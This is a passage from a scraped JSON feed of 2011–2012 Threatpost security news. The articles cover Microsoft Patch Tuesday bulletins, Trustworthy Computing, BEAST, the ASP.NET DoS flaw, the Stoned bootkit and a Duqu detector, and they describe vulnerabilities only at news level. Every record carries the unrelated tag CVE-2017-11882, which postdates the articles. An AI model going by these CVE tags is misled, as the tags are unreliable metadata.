"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. \nYou know what Microsoft was doing 10 years ago?\n\nMaking really, really buggy software and watching its customers get owned left and right.\n\nThe early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. VB script viruses such as I Love You, Melissa and others were running wild and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.\n\nAnd Microsoft didn\u2019t have any.\n\nThe company had spent the last few years defending itself against the [Department of Justice\u2019s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources\u2013not to mention money\u2013were devoted to the case, which Microsoft ultimately lost. Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.\n\nTo say that customers were not happy would be like saying Bill Gates has some money tucked away.\n\nAs it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.\n\nThe email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that\u2019s not really the case. [Gates\u2019s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.\n\nThe first step is admitting you have a problem, of course. But then you have to do something about it.\n\nA few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. Odd.\n\nAnd well before Gates pushed the button on his email, there were people inside the company talking about the same concepts\u2013reliability, robustness and resistance to attack\u2013and advocating that developers build their applications around them.\n\nIn the months following the publication of Gates\u2019s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company and features and functionality were the two-headed god that every developer worshipped. The chances of a team stoppping shipment because of a security problem at that point were zero point zero zero.\n\nBut within a few months of Gates\u2019s memo, that\u2019s exactly what happened. The company stopped development on several major products in order to put their developers through security training. Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that\u2019s seen as doing it the right way.\n\nBut it wasn\u2019t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft\u2019s public declaration of the need for change, the sentiment began to spread to some of its larger customers. Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.\n\nBy the middle to latter part of the decade, Microsoft not only wasn\u2019t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what\u2019s broken.\n\nSo, what Gates\u2019s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close. But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.\n\nEven for Microsoft.\n\n*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2012-01-12T14:43:00", "type": "threatpost", "title": "Ten Years After Gates's Memo, Effects Still Being Felt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "href": "https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&amp;D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "[](<https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/>)Microsoft on Tuesday patched the vulnerability in Windows that was exploited by the [BEAST SSL attack](<https://threatpost.com/new-attack-breaks-confidentiality-model-ssl-allows-theft-encrypted-cookies-091911/>) tool developed by Juliano Rizzo and Thai Duong last year. The patch is one of several rated important that was issued by Microsoft in [January\u2019s Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release, and there also was a critical bulletin released, fixing two separate vulnerabilities in Windows Media Player.\n\nThe vulnerability that is fixed by the patch in [MS12-](<https://technet.microsoft.com/en-us/security/bulletin/ms12-006>)006 actually lies in the SSL 3.0/TLS 1.0 protocol. The attack that Rizzo and Duong developed and released in September enables them to decrypt users\u2019 SSL sessions on the fly and hijack them, including sessions with online banking sites and other sensitive sites. The bug has been known for a long time, but it wasn\u2019t until last year that a practical exploitation of it surfaced.\n\n\u201cThis vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected,\u201d Microsoft said in its bulletin. \u201cThe security update addresses the vulnerability by modifying the way that the Windows Secure Channel (SChannel) component sends and receives encrypted network packets.\u201d\n\nThe highest priority bulletin for the January release is [MS12-004](<https://blogs.technet.com/b/srd/archive/2012/01/10/more-information-on-ms12-004.aspx?Redirected=true>), which includes fixes for two vulnerabilities in Windows Media Player. One of the bugs in that bulletin is the only critical one fixed in January, and it\u2019s a remote code execution flaw. It affects Windows XP, Vista, Server 2003 and Server 2008.\n\nThere\u2019s also a vulnerability in the Windows kernel that has the effect of allowing attackers to bypass one of the exploit-mitigation technologies in Windows, SafeSEH. After bypassing that, an attacker could then use other bugs to compromise an affected machine.\n\n\u201cThis issue can result in SafeSEH not being enforced for a binary that has been built with support for SafeSEH. This occurs when a binary that was built with Microsoft Visual C++ .NET 2003 RTM is loaded by an application running on a version of Windows that is affected by MS12-001,\u201d Microsoft said in the bulletin.\n\n\u201cThe reason that SafeSEH is not enforced in this scenario is because Microsoft Visual C++ .NET 2003 RTM produces binaries with metadata that is a different size than what the Windows loader expects. As a result, the loader conservatively falls back to assuming that the binary does not support SafeSEH. MS12-001 addresses this issue by allowing binaries to have metadata of the size that is produced by Microsoft Visual C++ .NET 2003 RTM.\u201d\n", "cvss3": {}, "published": "2012-01-10T19:31:32", "type": "threatpost", "title": "Microsoft Fixes BEAST SSL Bug in January Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:01", "id": "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "href": "https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/76083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "[](<https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/>)Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**[](<https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/>)UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. The vulnerability affects a wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workarounds decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible for the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Micros[](<https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/>)oft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworhty Computing Group said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it\u2019s possible that it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "cvss3": {}, "published": "2011-12-20T16:01:26", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:07", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn\u2019t change in The New School of Information Security and who he\u2019s learned the most from.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\nImage via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2011-12-12T15:12:45", "type": "threatpost", "title": "Adam Shostack on Methods of Compromise, the New School and Learning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:46:17", "id": "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "href": "https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past has created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. But ystems may still retain certain Duqu files even after the virus has deactivated itself.By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages a professional looks over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and lead to remote code execution. Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant, Microsoft, and Detroit based GM subsidiary, OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want to the Camera application to tag photo location. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt-out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": 